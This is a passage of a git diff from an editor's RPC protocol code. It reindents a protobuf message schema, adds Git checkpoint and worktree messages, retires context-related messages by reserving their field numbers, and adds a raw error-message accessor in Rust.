RespondToChannelInvite respond_to_channel_invite = 117; - UpdateChannels update_channels = 118; - JoinChannel join_channel = 119; - DeleteChannel delete_channel = 120; - GetChannelMembers get_channel_members = 121; - GetChannelMembersResponse get_channel_members_response = 122; - SetChannelMemberRole set_channel_member_role = 123; - RenameChannel rename_channel = 124; - RenameChannelResponse rename_channel_response = 125; - SubscribeToChannels subscribe_to_channels = 207; - - JoinChannelBuffer join_channel_buffer = 126; - JoinChannelBufferResponse join_channel_buffer_response = 127; - UpdateChannelBuffer update_channel_buffer = 128; - LeaveChannelBuffer leave_channel_buffer = 129; - UpdateChannelBufferCollaborators update_channel_buffer_collaborators = 130; - RejoinChannelBuffers rejoin_channel_buffers = 131; - RejoinChannelBuffersResponse rejoin_channel_buffers_response = 132; - AckBufferOperation ack_buffer_operation = 133; - - JoinChannelChat join_channel_chat = 134; - JoinChannelChatResponse join_channel_chat_response = 135; - LeaveChannelChat leave_channel_chat = 136; - SendChannelMessage send_channel_message = 137; - SendChannelMessageResponse send_channel_message_response = 138; - ChannelMessageSent channel_message_sent = 139; - GetChannelMessages get_channel_messages = 140; - GetChannelMessagesResponse get_channel_messages_response = 141; - RemoveChannelMessage remove_channel_message = 142; - AckChannelMessage ack_channel_message = 143; - GetChannelMessagesById get_channel_messages_by_id = 144; - - MoveChannel move_channel = 147; - ReorderChannel reorder_channel = 349; - SetChannelVisibility set_channel_visibility = 148; - - AddNotification add_notification = 149; - GetNotifications get_notifications = 150; - GetNotificationsResponse get_notifications_response = 151; - DeleteNotification delete_notification = 152; - MarkNotificationRead mark_notification_read = 153; - LspExtExpandMacro lsp_ext_expand_macro = 154; - LspExtExpandMacroResponse lsp_ext_expand_macro_response = 155; - SetRoomParticipantRole set_room_participant_role = 156; - - UpdateUserChannels update_user_channels = 157; - - GetImplementation get_implementation = 162; - GetImplementationResponse get_implementation_response = 163; - - UpdateChannelMessage update_channel_message = 170; - ChannelMessageUpdate channel_message_update = 171; - - BlameBuffer blame_buffer = 172; - BlameBufferResponse blame_buffer_response = 173; - - UpdateNotification update_notification = 174; - - RestartLanguageServers restart_language_servers = 208; - - RejoinRemoteProjects rejoin_remote_projects = 186; - RejoinRemoteProjectsResponse rejoin_remote_projects_response = 187; - - OpenNewBuffer open_new_buffer = 196; - - TaskContextForLocation task_context_for_location = 203; - TaskContext task_context = 204; - - LinkedEditingRange linked_editing_range = 209; - LinkedEditingRangeResponse linked_editing_range_response = 210; - - AdvertiseContexts advertise_contexts = 211; - OpenContext open_context = 212; - OpenContextResponse open_context_response = 213; - CreateContext create_context = 232; - CreateContextResponse create_context_response = 233; - UpdateContext update_context = 214; - SynchronizeContexts synchronize_contexts = 215; - SynchronizeContextsResponse synchronize_contexts_response = 216; - - GetSignatureHelp get_signature_help = 217; - GetSignatureHelpResponse get_signature_help_response = 218; - - ListRemoteDirectory list_remote_directory = 219; - ListRemoteDirectoryResponse list_remote_directory_response = 220; - AddWorktree add_worktree = 222; - AddWorktreeResponse add_worktree_response = 223; - - LspExtSwitchSourceHeader lsp_ext_switch_source_header = 241; - LspExtSwitchSourceHeaderResponse lsp_ext_switch_source_header_response = 242; - - FindSearchCandidates find_search_candidates = 243; - - CloseBuffer close_buffer = 245; - - ShutdownRemoteServer shutdown_remote_server = 257; - - RemoveWorktree remove_worktree = 258; - - LanguageServerLog language_server_log = 260; - - Toast toast = 261; - HideToast hide_toast = 262; - - OpenServerSettings open_server_settings = 263; - - GetPermalinkToLine get_permalink_to_line = 264; - GetPermalinkToLineResponse get_permalink_to_line_response = 265; + uint32 id = 1; + optional uint32 responding_to = 2; + optional PeerId original_sender_id = 3; + optional uint32 ack_id = 266; + + oneof payload { + Hello hello = 4; + Ack ack = 5; + Error error = 6; + Ping ping = 7; + Test test = 8; + EndStream end_stream = 165; + + CreateRoom create_room = 9; + CreateRoomResponse create_room_response = 10; + JoinRoom join_room = 11; + JoinRoomResponse join_room_response = 12; + RejoinRoom rejoin_room = 13; + RejoinRoomResponse rejoin_room_response = 14; + LeaveRoom leave_room = 15; + Call call = 16; + IncomingCall incoming_call = 17; + CallCanceled call_canceled = 18; + CancelCall cancel_call = 19; + DeclineCall decline_call = 20; + UpdateParticipantLocation update_participant_location = 21; + RoomUpdated room_updated = 22; + + ShareProject share_project = 23; + ShareProjectResponse share_project_response = 24; + UnshareProject unshare_project = 25; + JoinProject join_project = 26; + JoinProjectResponse join_project_response = 27; + LeaveProject leave_project = 28; + AddProjectCollaborator add_project_collaborator = 29; + UpdateProjectCollaborator update_project_collaborator = 30; + RemoveProjectCollaborator remove_project_collaborator = 31; + + GetDefinition get_definition = 32; + GetDefinitionResponse get_definition_response = 33; + GetDeclaration get_declaration = 237; + GetDeclarationResponse get_declaration_response = 238; + GetTypeDefinition get_type_definition = 34; + GetTypeDefinitionResponse get_type_definition_response = 35; + + GetReferences get_references = 36; + GetReferencesResponse get_references_response = 37; + GetDocumentHighlights get_document_highlights = 38; + GetDocumentHighlightsResponse get_document_highlights_response = 39; + GetProjectSymbols get_project_symbols = 40; + GetProjectSymbolsResponse get_project_symbols_response = 41; + OpenBufferForSymbol open_buffer_for_symbol = 42; + OpenBufferForSymbolResponse open_buffer_for_symbol_response = 43; + + UpdateProject update_project = 44; + UpdateWorktree update_worktree = 45; + + CreateProjectEntry create_project_entry = 46; + RenameProjectEntry rename_project_entry = 47; + CopyProjectEntry copy_project_entry = 48; + DeleteProjectEntry delete_project_entry = 49; + ProjectEntryResponse project_entry_response = 50; + ExpandProjectEntry expand_project_entry = 51; + ExpandProjectEntryResponse expand_project_entry_response = 52; + ExpandAllForProjectEntry expand_all_for_project_entry = 291; + ExpandAllForProjectEntryResponse expand_all_for_project_entry_response = 292; + UpdateDiagnosticSummary update_diagnostic_summary = 53; + StartLanguageServer start_language_server = 54; + UpdateLanguageServer update_language_server = 55; + + OpenBufferById open_buffer_by_id = 56; + OpenBufferByPath open_buffer_by_path = 57; + OpenBufferResponse open_buffer_response = 58; + CreateBufferForPeer create_buffer_for_peer = 59; + UpdateBuffer update_buffer = 60; + UpdateBufferFile update_buffer_file = 61; + SaveBuffer save_buffer = 62; + BufferSaved buffer_saved = 63; + BufferReloaded buffer_reloaded = 64; + ReloadBuffers reload_buffers = 65; + ReloadBuffersResponse reload_buffers_response = 66; + SynchronizeBuffers synchronize_buffers = 67; + SynchronizeBuffersResponse synchronize_buffers_response = 68; + FormatBuffers format_buffers = 69; + FormatBuffersResponse format_buffers_response = 70; + GetCompletions get_completions = 71; + GetCompletionsResponse get_completions_response = 72; + ResolveCompletionDocumentation resolve_completion_documentation = 73; + ResolveCompletionDocumentationResponse resolve_completion_documentation_response = 74; + ApplyCompletionAdditionalEdits apply_completion_additional_edits = 75; + ApplyCompletionAdditionalEditsResponse apply_completion_additional_edits_response = 76; + GetCodeActions get_code_actions = 77; + GetCodeActionsResponse get_code_actions_response = 78; + GetHover get_hover = 79; + GetHoverResponse get_hover_response = 80; + ApplyCodeAction apply_code_action = 81; + ApplyCodeActionResponse apply_code_action_response = 82; + PrepareRename prepare_rename = 83; + PrepareRenameResponse prepare_rename_response = 84; + PerformRename perform_rename = 85; + PerformRenameResponse perform_rename_response = 86; + + UpdateContacts update_contacts = 89; + ShowContacts show_contacts = 91; + + GetUsers get_users = 92; + FuzzySearchUsers fuzzy_search_users = 93; + UsersResponse users_response = 94; + RequestContact request_contact = 95; + RespondToContactRequest respond_to_contact_request = 96; + RemoveContact remove_contact = 97; + + Follow follow = 98; + FollowResponse follow_response = 99; + UpdateFollowers update_followers = 100; + Unfollow unfollow = 101; + UpdateDiffBases update_diff_bases = 104; + + OnTypeFormatting on_type_formatting = 105; + OnTypeFormattingResponse on_type_formatting_response = 106; + + UpdateWorktreeSettings update_worktree_settings = 107; + + InlayHints inlay_hints = 108; + InlayHintsResponse inlay_hints_response = 109; + ResolveInlayHint resolve_inlay_hint = 110; + ResolveInlayHintResponse resolve_inlay_hint_response = 111; + RefreshInlayHints refresh_inlay_hints = 112; + + CreateChannel create_channel = 113; + CreateChannelResponse create_channel_response = 114; + InviteChannelMember invite_channel_member = 115; + RemoveChannelMember remove_channel_member = 116; + RespondToChannelInvite respond_to_channel_invite = 117; + UpdateChannels update_channels = 118; + JoinChannel join_channel = 119; + DeleteChannel delete_channel = 120; + GetChannelMembers get_channel_members = 121; + GetChannelMembersResponse get_channel_members_response = 122; + SetChannelMemberRole set_channel_member_role = 123; + RenameChannel rename_channel = 124; + RenameChannelResponse rename_channel_response = 125; + SubscribeToChannels subscribe_to_channels = 207; + + JoinChannelBuffer join_channel_buffer = 126; + JoinChannelBufferResponse join_channel_buffer_response = 127; + UpdateChannelBuffer update_channel_buffer = 128; + LeaveChannelBuffer leave_channel_buffer = 129; + UpdateChannelBufferCollaborators update_channel_buffer_collaborators = 130; + RejoinChannelBuffers rejoin_channel_buffers = 131; + RejoinChannelBuffersResponse rejoin_channel_buffers_response = 132; + AckBufferOperation ack_buffer_operation = 133; + + JoinChannelChat join_channel_chat = 134; + JoinChannelChatResponse join_channel_chat_response = 135; + LeaveChannelChat leave_channel_chat = 136; + SendChannelMessage send_channel_message = 137; + SendChannelMessageResponse send_channel_message_response = 138; + ChannelMessageSent channel_message_sent = 139; + GetChannelMessages get_channel_messages = 140; + GetChannelMessagesResponse get_channel_messages_response = 141; + RemoveChannelMessage remove_channel_message = 142; + AckChannelMessage ack_channel_message = 143; + GetChannelMessagesById get_channel_messages_by_id = 144; + + MoveChannel move_channel = 147; + ReorderChannel reorder_channel = 349; + SetChannelVisibility set_channel_visibility = 148; + + AddNotification add_notification = 149; + GetNotifications get_notifications = 150; + GetNotificationsResponse get_notifications_response = 151; + DeleteNotification delete_notification = 152; + MarkNotificationRead mark_notification_read = 153; + LspExtExpandMacro lsp_ext_expand_macro = 154; + LspExtExpandMacroResponse lsp_ext_expand_macro_response = 155; + SetRoomParticipantRole set_room_participant_role = 156; + + UpdateUserChannels update_user_channels = 157; + + GetImplementation get_implementation = 162; + GetImplementationResponse get_implementation_response = 163; + + UpdateChannelMessage update_channel_message = 170; + ChannelMessageUpdate channel_message_update = 171; + + BlameBuffer blame_buffer = 172; + BlameBufferResponse blame_buffer_response = 173; - FlushBufferedMessages flush_buffered_messages = 267; + UpdateNotification update_notification = 174; - LanguageServerPromptRequest language_server_prompt_request = 268; - LanguageServerPromptResponse language_server_prompt_response = 269; + RestartLanguageServers restart_language_servers = 208; - GitBranchesResponse git_branches_response = 271; + RejoinRemoteProjects rejoin_remote_projects = 186; + RejoinRemoteProjectsResponse rejoin_remote_projects_response = 187; - UpdateGitBranch update_git_branch = 272; + OpenNewBuffer open_new_buffer = 196; - ListToolchains list_toolchains = 273; - ListToolchainsResponse list_toolchains_response = 274; - ActivateToolchain activate_toolchain = 275; - ActiveToolchain active_toolchain = 276; - ActiveToolchainResponse active_toolchain_response = 277; + TaskContextForLocation task_context_for_location = 203; + TaskContext task_context = 204; - GetPathMetadata get_path_metadata = 278; - GetPathMetadataResponse get_path_metadata_response = 279; + LinkedEditingRange linked_editing_range = 209; + LinkedEditingRangeResponse linked_editing_range_response = 210; - CancelLanguageServerWork cancel_language_server_work = 282; + GetSignatureHelp get_signature_help = 217; + GetSignatureHelpResponse get_signature_help_response = 218; - LspExtOpenDocs lsp_ext_open_docs = 283; - LspExtOpenDocsResponse lsp_ext_open_docs_response = 284; + ListRemoteDirectory list_remote_directory = 219; + ListRemoteDirectoryResponse list_remote_directory_response = 220; + AddWorktree add_worktree = 222; + AddWorktreeResponse add_worktree_response = 223; - SyncExtensions sync_extensions = 285; - SyncExtensionsResponse sync_extensions_response = 286; - InstallExtension install_extension = 287; + LspExtSwitchSourceHeader lsp_ext_switch_source_header = 241; + LspExtSwitchSourceHeaderResponse lsp_ext_switch_source_header_response = 242; - OpenUnstagedDiff open_unstaged_diff = 288; - OpenUnstagedDiffResponse open_unstaged_diff_response = 289; + FindSearchCandidates find_search_candidates = 243; - RegisterBufferWithLanguageServers register_buffer_with_language_servers = 290; + CloseBuffer close_buffer = 245; - Stage stage = 293; - Unstage unstage = 294; - Commit commit = 295; - OpenCommitMessageBuffer open_commit_message_buffer = 296; + ShutdownRemoteServer shutdown_remote_server = 257; - OpenUncommittedDiff open_uncommitted_diff = 297; - OpenUncommittedDiffResponse open_uncommitted_diff_response = 298; + RemoveWorktree remove_worktree = 258; - SetIndexText set_index_text = 299; + LanguageServerLog language_server_log = 260; - GitShow git_show = 300; - GitReset git_reset = 301; - GitCommitDetails git_commit_details = 302; - GitCheckoutFiles git_checkout_files = 303; + Toast toast = 261; + HideToast hide_toast = 262; - Push push = 304; - Fetch fetch = 305; - GetRemotes get_remotes = 306; - GetRemotesResponse get_remotes_response = 307; - Pull pull = 308; + OpenServerSettings open_server_settings = 263; - ApplyCodeActionKind apply_code_action_kind = 309; - ApplyCodeActionKindResponse apply_code_action_kind_response = 310; + GetPermalinkToLine get_permalink_to_line = 264; + GetPermalinkToLineResponse get_permalink_to_line_response = 265; - RemoteMessageResponse remote_message_response = 311; + FlushBufferedMessages flush_buffered_messages = 267; - GitGetBranches git_get_branches = 312; - GitCreateBranch git_create_branch = 313; - GitChangeBranch git_change_branch = 314; + LanguageServerPromptRequest language_server_prompt_request = 268; + LanguageServerPromptResponse language_server_prompt_response = 269; - CheckForPushedCommits check_for_pushed_commits = 315; - CheckForPushedCommitsResponse check_for_pushed_commits_response = 316; + GitBranchesResponse git_branches_response = 271; - AskPassRequest ask_pass_request = 317; - AskPassResponse ask_pass_response = 318; + UpdateGitBranch update_git_branch = 272; - GitDiff git_diff = 319; - GitDiffResponse git_diff_response = 320; - GitInit git_init = 321; + ListToolchains list_toolchains = 273; + ListToolchainsResponse list_toolchains_response = 274; + ActivateToolchain activate_toolchain = 275; + ActiveToolchain active_toolchain = 276; + ActiveToolchainResponse active_toolchain_response = 277; - CodeLens code_lens = 322; - GetCodeLens get_code_lens = 323; - GetCodeLensResponse get_code_lens_response = 324; - RefreshCodeLens refresh_code_lens = 325; + GetPathMetadata get_path_metadata = 278; + GetPathMetadataResponse get_path_metadata_response = 279; - ToggleBreakpoint toggle_breakpoint = 326; - BreakpointsForFile breakpoints_for_file = 327; + CancelLanguageServerWork cancel_language_server_work = 282; - UpdateRepository update_repository = 328; - RemoveRepository remove_repository = 329; + LspExtOpenDocs lsp_ext_open_docs = 283; + LspExtOpenDocsResponse lsp_ext_open_docs_response = 284; - GetDocumentSymbols get_document_symbols = 330; - GetDocumentSymbolsResponse get_document_symbols_response = 331; + SyncExtensions sync_extensions = 285; + SyncExtensionsResponse sync_extensions_response = 286; + InstallExtension install_extension = 287; - LoadCommitDiff load_commit_diff = 334; - LoadCommitDiffResponse load_commit_diff_response = 335; + OpenUnstagedDiff open_unstaged_diff = 288; + OpenUnstagedDiffResponse open_unstaged_diff_response = 289; - StopLanguageServers stop_language_servers = 336; + RegisterBufferWithLanguageServers register_buffer_with_language_servers = 290; - LspExtRunnables lsp_ext_runnables = 337; - LspExtRunnablesResponse lsp_ext_runnables_response = 338; + Stage stage = 293; + Unstage unstage = 294; + Commit commit = 295; + OpenCommitMessageBuffer open_commit_message_buffer = 296; - GetDebugAdapterBinary get_debug_adapter_binary = 339; - DebugAdapterBinary debug_adapter_binary = 340; - RunDebugLocators run_debug_locators = 341; - DebugRequest debug_request = 342; + OpenUncommittedDiff open_uncommitted_diff = 297; + OpenUncommittedDiffResponse open_uncommitted_diff_response = 298; - LspExtGoToParentModule lsp_ext_go_to_parent_module = 343; - LspExtGoToParentModuleResponse lsp_ext_go_to_parent_module_response = 344; - LspExtCancelFlycheck lsp_ext_cancel_flycheck = 345; - LspExtRunFlycheck lsp_ext_run_flycheck = 346; - LspExtClearFlycheck lsp_ext_clear_flycheck = 347; + SetIndexText set_index_text = 299; - LogToDebugConsole log_to_debug_console = 348; + GitShow git_show = 300; + GitReset git_reset = 301; + GitCommitDetails git_commit_details = 302; + GitCheckoutFiles git_checkout_files = 303; - GetDocumentDiagnostics get_document_diagnostics = 350; - GetDocumentDiagnosticsResponse get_document_diagnostics_response = 351; - PullWorkspaceDiagnostics pull_workspace_diagnostics = 352; + Push push = 304; + Fetch fetch = 305; + GetRemotes get_remotes = 306; + GetRemotesResponse get_remotes_response = 307; + Pull pull = 308; - GetDocumentColor get_document_color = 353; - GetDocumentColorResponse get_document_color_response = 354; - GetColorPresentation get_color_presentation = 355; - GetColorPresentationResponse get_color_presentation_response = 356; + ApplyCodeActionKind apply_code_action_kind = 309; + ApplyCodeActionKindResponse apply_code_action_kind_response = 310; - Stash stash = 357; - StashPop stash_pop = 358; + RemoteMessageResponse remote_message_response = 311; - GetDefaultBranch get_default_branch = 359; - GetDefaultBranchResponse get_default_branch_response = 360; + GitGetBranches git_get_branches = 312; + GitCreateBranch git_create_branch = 313; + GitChangeBranch git_change_branch = 314; - GetCrashFiles get_crash_files = 361; - GetCrashFilesResponse get_crash_files_response = 362; + CheckForPushedCommits check_for_pushed_commits = 315; + CheckForPushedCommitsResponse check_for_pushed_commits_response = 316; - GitClone git_clone = 363; - GitCloneResponse git_clone_response = 364; + AskPassRequest ask_pass_request = 317; + AskPassResponse ask_pass_response = 318; - LspQuery lsp_query = 365; - LspQueryResponse lsp_query_response = 366; - ToggleLspLogs toggle_lsp_logs = 367; + GitDiff git_diff = 319; + GitDiffResponse git_diff_response = 320; + GitInit git_init = 321; - UpdateUserSettings update_user_settings = 368; + CodeLens code_lens = 322; + GetCodeLens get_code_lens = 323; + GetCodeLensResponse get_code_lens_response = 324; + RefreshCodeLens refresh_code_lens = 325; - GetProcesses get_processes = 369; - GetProcessesResponse get_processes_response = 370; + ToggleBreakpoint toggle_breakpoint = 326; + BreakpointsForFile breakpoints_for_file = 327; - ResolveToolchain resolve_toolchain = 371; - ResolveToolchainResponse resolve_toolchain_response = 372; + UpdateRepository update_repository = 328; + RemoveRepository remove_repository = 329; - GetAgentServerCommand get_agent_server_command = 373; - AgentServerCommand agent_server_command = 374; + GetDocumentSymbols get_document_symbols = 330; + GetDocumentSymbolsResponse get_document_symbols_response = 331; - ExternalAgentsUpdated external_agents_updated = 375; - ExternalAgentLoadingStatusUpdated external_agent_loading_status_updated = 376; - NewExternalAgentVersionAvailable new_external_agent_version_available = 377; + LoadCommitDiff load_commit_diff = 334; + LoadCommitDiffResponse load_commit_diff_response = 335; - StashDrop stash_drop = 378; - StashApply stash_apply = 379; + StopLanguageServers stop_language_servers = 336; - GitRenameBranch git_rename_branch = 380; + LspExtRunnables lsp_ext_runnables = 337; + LspExtRunnablesResponse lsp_ext_runnables_response = 338; - RemoteStarted remote_started = 381; + GetDebugAdapterBinary get_debug_adapter_binary = 339; + DebugAdapterBinary debug_adapter_binary = 340; + RunDebugLocators run_debug_locators = 341; + DebugRequest debug_request = 342; - GetDirectoryEnvironment get_directory_environment = 382; - DirectoryEnvironment directory_environment = 383; + LspExtGoToParentModule lsp_ext_go_to_parent_module = 343; + LspExtGoToParentModuleResponse lsp_ext_go_to_parent_module_response = 344; + LspExtCancelFlycheck lsp_ext_cancel_flycheck = 345; + LspExtRunFlycheck lsp_ext_run_flycheck = 346; + LspExtClearFlycheck lsp_ext_clear_flycheck = 347; - GetTreeDiff get_tree_diff = 384; - GetTreeDiffResponse get_tree_diff_response = 385; + LogToDebugConsole log_to_debug_console = 348; - GetBlobContent get_blob_content = 386; - GetBlobContentResponse get_blob_content_response = 387; + GetDocumentDiagnostics get_document_diagnostics = 350; + GetDocumentDiagnosticsResponse get_document_diagnostics_response = 351; + PullWorkspaceDiagnostics pull_workspace_diagnostics = 352; - GitWorktreesResponse git_worktrees_response = 388; - GitGetWorktrees git_get_worktrees = 389; - GitCreateWorktree git_create_worktree = 390; + GetDocumentColor get_document_color = 353; + GetDocumentColorResponse get_document_color_response = 354; + GetColorPresentation get_color_presentation = 355; + GetColorPresentationResponse get_color_presentation_response = 356; - OpenImageByPath open_image_by_path = 391; - OpenImageResponse open_image_response = 392; - CreateImageForPeer create_image_for_peer = 393; + Stash stash = 357; + StashPop stash_pop = 358; + GetDefaultBranch get_default_branch = 359; + GetDefaultBranchResponse get_default_branch_response = 360; - GitFileHistory git_file_history = 397; - GitFileHistoryResponse git_file_history_response = 398; + GetCrashFiles get_crash_files = 361; + GetCrashFilesResponse get_crash_files_response = 362; - RunGitHook run_git_hook = 399; + GitClone git_clone = 363; + GitCloneResponse git_clone_response = 364; - GitDeleteBranch git_delete_branch = 400; + LspQuery lsp_query = 365; + LspQueryResponse lsp_query_response = 366; + ToggleLspLogs toggle_lsp_logs = 367; - ExternalExtensionAgentsUpdated external_extension_agents_updated = 401; + UpdateUserSettings update_user_settings = 368; - GitCreateRemote git_create_remote = 402; - GitRemoveRemote git_remove_remote = 403; + GetProcesses get_processes = 369; + GetProcessesResponse get_processes_response = 370; - TrustWorktrees trust_worktrees = 404; - RestrictWorktrees restrict_worktrees = 405; + ResolveToolchain resolve_toolchain = 371; + ResolveToolchainResponse resolve_toolchain_response = 372; - ShareAgentThread share_agent_thread = 406; - GetSharedAgentThread get_shared_agent_thread = 407; - GetSharedAgentThreadResponse get_shared_agent_thread_response = 408; + GetAgentServerCommand get_agent_server_command = 373; + AgentServerCommand agent_server_command = 374; - FindSearchCandidatesChunk find_search_candidates_chunk = 409; - FindSearchCandidatesCancelled find_search_candidates_cancelled = 410; - GetContextServerCommand get_context_server_command = 411; - ContextServerCommand context_server_command = 412; + ExternalAgentsUpdated external_agents_updated = 375; + ExternalAgentLoadingStatusUpdated external_agent_loading_status_updated = 376; + NewExternalAgentVersionAvailable new_external_agent_version_available = 377; - AllocateWorktreeId allocate_worktree_id = 413; - AllocateWorktreeIdResponse allocate_worktree_id_response = 414; + StashDrop stash_drop = 378; + StashApply stash_apply = 379; - DownloadFileByPath download_file_by_path = 415; - DownloadFileResponse download_file_response = 416; - CreateFileForPeer create_file_for_peer = 417; + GitRenameBranch git_rename_branch = 380; - SemanticTokens semantic_tokens = 418; - SemanticTokensResponse semantic_tokens_response = 419; - RefreshSemanticTokens refresh_semantic_tokens = 420; - GetFoldingRanges get_folding_ranges = 421; - GetFoldingRangesResponse get_folding_ranges_response = 422; + RemoteStarted remote_started = 381; - GetRemoteProfilingData get_remote_profiling_data = 423; - GetRemoteProfilingDataResponse get_remote_profiling_data_response = 424; - - SpawnKernel spawn_kernel = 426; - SpawnKernelResponse spawn_kernel_response = 427; - KillKernel kill_kernel = 428; - GitDiffStat git_diff_stat = 429; - GitDiffStatResponse git_diff_stat_response = 430; // current max - } + GetDirectoryEnvironment get_directory_environment = 382; + DirectoryEnvironment directory_environment = 383; - reserved 87 to 88; - reserved 90; - reserved 102 to 103; - reserved 158 to 161; - reserved 164; - reserved 166 to 169; - reserved 175 to 185; - reserved 188 to 195; - reserved 197; - reserved 198 to 202; - reserved 205 to 206; - reserved 221; - reserved 224 to 231; - reserved 234 to 236; - reserved 239 to 240; - reserved 244; - reserved 246 to 256; - reserved 259; - reserved 270; - reserved 280 to 281; - reserved 332 to 333; - reserved 394 to 396; + GetTreeDiff get_tree_diff = 384; + GetTreeDiffResponse get_tree_diff_response = 385; + + GetBlobContent get_blob_content = 386; + GetBlobContentResponse get_blob_content_response = 387; + + GitWorktreesResponse git_worktrees_response = 388; + GitGetWorktrees git_get_worktrees = 389; + GitCreateWorktree git_create_worktree = 390; + + OpenImageByPath open_image_by_path = 391; + OpenImageResponse open_image_response = 392; + CreateImageForPeer create_image_for_peer = 393; + + GitFileHistory git_file_history = 397; + GitFileHistoryResponse git_file_history_response = 398; + + RunGitHook run_git_hook = 399; + + GitDeleteBranch git_delete_branch = 400; + + ExternalExtensionAgentsUpdated external_extension_agents_updated = 401; + + GitCreateRemote git_create_remote = 402; + GitRemoveRemote git_remove_remote = 403; + + TrustWorktrees trust_worktrees = 404; + RestrictWorktrees restrict_worktrees = 405; + + ShareAgentThread share_agent_thread = 406; + GetSharedAgentThread get_shared_agent_thread = 407; + GetSharedAgentThreadResponse get_shared_agent_thread_response = 408; + + FindSearchCandidatesChunk find_search_candidates_chunk = 409; + FindSearchCandidatesCancelled find_search_candidates_cancelled = 410; + GetContextServerCommand get_context_server_command = 411; + ContextServerCommand context_server_command = 412; + + AllocateWorktreeId allocate_worktree_id = 413; + AllocateWorktreeIdResponse allocate_worktree_id_response = 414; + + DownloadFileByPath download_file_by_path = 415; + DownloadFileResponse download_file_response = 416; + CreateFileForPeer create_file_for_peer = 417; + + SemanticTokens semantic_tokens = 418; + SemanticTokensResponse semantic_tokens_response = 419; + RefreshSemanticTokens refresh_semantic_tokens = 420; + GetFoldingRanges get_folding_ranges = 421; + GetFoldingRangesResponse get_folding_ranges_response = 422; + + GetRemoteProfilingData get_remote_profiling_data = 423; + GetRemoteProfilingDataResponse get_remote_profiling_data_response = 424; + + SpawnKernel spawn_kernel = 426; + SpawnKernelResponse spawn_kernel_response = 427; + KillKernel kill_kernel = 428; + GitRemoveWorktree git_remove_worktree = 431; + GitRenameWorktree git_rename_worktree = 432; + GitCreateCheckpoint git_create_checkpoint = 433; + GitCreateCheckpointResponse git_create_checkpoint_response = 434; + GitRestoreCheckpoint git_restore_checkpoint = 435; + GitCompareCheckpoints git_compare_checkpoints = 436; + GitCompareCheckpointsResponse git_compare_checkpoints_response = 437; + GitDiffCheckpoints git_diff_checkpoints = 438; + GitDiffCheckpointsResponse git_diff_checkpoints_response = 439; + GitGetHeadSha git_get_head_sha = 440; + GitGetHeadShaResponse git_get_head_sha_response = 441; // current max + } + + reserved 87 to 88; + reserved 90; + reserved 102 to 103; + reserved 158 to 161; + reserved 164; + reserved 166 to 169; + reserved 175 to 185; + reserved 188 to 195; + reserved 197; + reserved 198 to 202; + reserved 205 to 206; + reserved 221; + reserved 224 to 231; + reserved 234 to 236; + reserved 239 to 240; + reserved 244; + reserved 246 to 256; + reserved 259; + reserved 270; + reserved 280 to 281; + reserved 332 to 333; + reserved 394 to 396; + reserved 429 to 430; + reserved 211 to 216, 232 to 233; } message Hello { - PeerId peer_id = 1; + PeerId peer_id = 1; } message Ping {} @@ -514,37 +514,37 @@ message Ping {} message Ack {} message Error { - string message = 1; - ErrorCode code = 2; - repeated string tags = 3; + string message = 1; + ErrorCode code = 2; + repeated string tags = 3; } enum ErrorCode { - Internal = 0; - NoSuchChannel = 1; - Disconnected = 2; - SignedOut = 3; - UpgradeRequired = 4; - Forbidden = 5; - NeedsCla = 7; - NotARootChannel = 8; - BadPublicNesting = 9; - CircularNesting = 10; - WrongMoveTarget = 11; - UnsharedItem = 12; - NoSuchProject = 13; - DevServerProjectPathDoesNotExist = 16; - RemoteUpgradeRequired = 17; - RateLimitExceeded = 18; - CommitFailed = 19; - reserved 6; - reserved 14 to 15; + Internal = 0; + NoSuchChannel = 1; + Disconnected = 2; + SignedOut = 3; + UpgradeRequired = 4; + Forbidden = 5; + NeedsCla = 7; + NotARootChannel = 8; + BadPublicNesting = 9; + CircularNesting = 10; + WrongMoveTarget = 11; + UnsharedItem = 12; + NoSuchProject = 13; + DevServerProjectPathDoesNotExist = 16; + RemoteUpgradeRequired = 17; + RateLimitExceeded = 18; + CommitFailed = 19; + reserved 6; + reserved 14 to 15; } message EndStream {} message Test { - uint64 id = 1; + uint64 id = 1; } message FlushBufferedMessages {} @@ -554,19 +554,19 @@ message FlushBufferedMessagesResponse {} message RemoteStarted {} message SpawnKernel { - string kernel_name = 1; - string working_directory = 2; - uint64 project_id = 3; - string command = 4; - repeated string args = 5; + string kernel_name = 1; + string working_directory = 2; + uint64 project_id = 3; + string command = 4; + repeated string args = 5; } message SpawnKernelResponse { - string kernel_id = 1; - string connection_file = 2; + string kernel_id = 1; + string connection_file = 2; } message KillKernel { - string kernel_id = 1; - uint64 project_id = 2; + string kernel_id = 1; + uint64 project_id = 2; } diff --git a/crates/proto/src/error.rs b/crates/proto/src/error.rs index d83b0fc499ba9dddb1d6417307fea9eaed9fdfd7..f551e8c3fc4d7023f5d9d43c3dc6eb51ffe2bb46 100644 --- a/crates/proto/src/error.rs +++ b/crates/proto/src/error.rs @@ -159,6 +159,12 @@ pub struct RpcError { /// in the app; however it is useful for chaining .message() and .with_tag() on /// ErrorCode. impl RpcError { + /// Returns the raw server-provided error message without any RPC framing + /// (e.g. without the "RPC request X failed: " prefix that `Display` adds). + pub fn raw_message(&self) -> &str { + &self.msg + } + /// from_proto converts a crate::Error into an anyhow::Error containing /// an RpcError. pub fn from_proto(error: &crate::Error, request: &str) -> anyhow::Error { diff --git a/crates/proto/src/proto.rs b/crates/proto/src/proto.rs index 3d30551557000c305a82b328828b566c9d78f75e..b77bd02313c13a9b04eb7762a97f9e77ac8cbaf8 100644 --- a/crates/proto/src/proto.rs +++ b/crates/proto/src/proto.rs @@ -32,7 +32,6 @@ messages!( (AddProjectCollaborator, Foreground), (AddWorktree, Foreground), (AddWorktreeResponse, Foreground), - (AdvertiseContexts, Foreground), (AllocateWorktreeId, Foreground), (AllocateWorktreeIdResponse, Foreground), (ApplyCodeAction, Background), @@ -58,8 +57,6 @@ messages!( (CreateFileForPeer, Foreground), (CreateChannel, Foreground), (CreateChannelResponse, Foreground), - (CreateContext, Foreground), - (CreateContextResponse, Foreground), (CreateProjectEntry, Foreground), (CreateRoom, Foreground), (CreateRoomResponse, Foreground), @@ -191,8 +188,6 @@ messages!( (OpenBufferResponse, Background), (OpenImageResponse, Background), (OpenCommitMessageBuffer, Background), - (OpenContext, Foreground), - (OpenContextResponse, Foreground), (OpenNewBuffer, Foreground), (OpenServerSettings, Foreground), (PerformRename, Background), @@ -258,8 +253,6 @@ messages!( (ToggleBreakpoint, Foreground), (SynchronizeBuffers, Foreground), (SynchronizeBuffersResponse, Foreground), - (SynchronizeContexts, Foreground), - (SynchronizeContextsResponse, 